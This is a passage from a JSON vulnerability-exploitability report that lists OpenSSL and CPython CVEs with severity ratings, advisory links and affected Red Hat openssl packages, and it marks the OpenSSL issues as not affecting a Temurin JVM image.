          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-3vqq-45qg-2xf6"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2502e7b7d4c0cf4f972a881641fe09edc67aeec4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/572844beca95068394c916626a6d3a490f831a49"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7bbca05be55b129651d9df4bdb92becc45002c12"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/eeee3cbd4d682095ed431052f00403004596373e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ef2fb66ec571564d64d1c74a12e388a2a54d05d2"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-22795.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22795"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22795"
        }
      ],
      "published": "2026-01-27T16:16:35+00:00",
      "updated": "2026-06-17T10:20:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-22796",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        754
      ],
      "description": "Issue summary: A type confusion vulnerability exists in the signature\nverification of signed PKCS#7 data where an ASN1_TYPE union member is\naccessed without first validating the type, causing an invalid or NULL\npointer dereference when processing malformed PKCS#7 data.\n\nImpact summary: An application performing signature verification of PKCS#7\ndata or calling directly the PKCS7_digest_from_attributes() function can be\ncaused to dereference an invalid or NULL pointer when reading, resulting in\na Denial of Service.\n\nThe function PKCS7_digest_from_attributes() accesses the message digest attribute\nvalue without validating its type. When the type is not V_ASN1_OCTET_STRING,\nthis results in accessing invalid memory through the ASN1_TYPE union, causing\na crash.\n\nExploiting this vulnerability requires an attacker to provide a malformed\nsigned PKCS#7 to an application that verifies it. The impact of the\nexploit is just a Denial of Service, the PKCS7 API is legacy and applications\nshould be using the CMS API instead. For these reasons the issue was\nassessed as Low severity.\n\nThe FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS#7 parsing implementation is outside the OpenSSL FIPS module\nboundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22796"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-r9hf-rxjm-gv2f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2502e7b7d4c0cf4f972a881641fe09edc67aeec4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/572844beca95068394c916626a6d3a490f831a49"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7bbca05be55b129651d9df4bdb92becc45002c12"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/eeee3cbd4d682095ed431052f00403004596373e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ef2fb66ec571564d64d1c74a12e388a2a54d05d2"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-22796.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22796"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22796"
        }
      ],
      "published": "2026-01-27T16:16:35+00:00",
      "updated": "2026-06-17T10:20:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-2297",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        668
      ],
      "description": "The import hook in CPython that handles legacy *.pyc files (SourcelessFileLoader) is incorrectly handled in FileLoader (a base class) and so does not use io.open_code() to read the .pyc files. sys.audit handlers for this audit event therefore do not fire.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-2297"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/05/6"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-2297"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
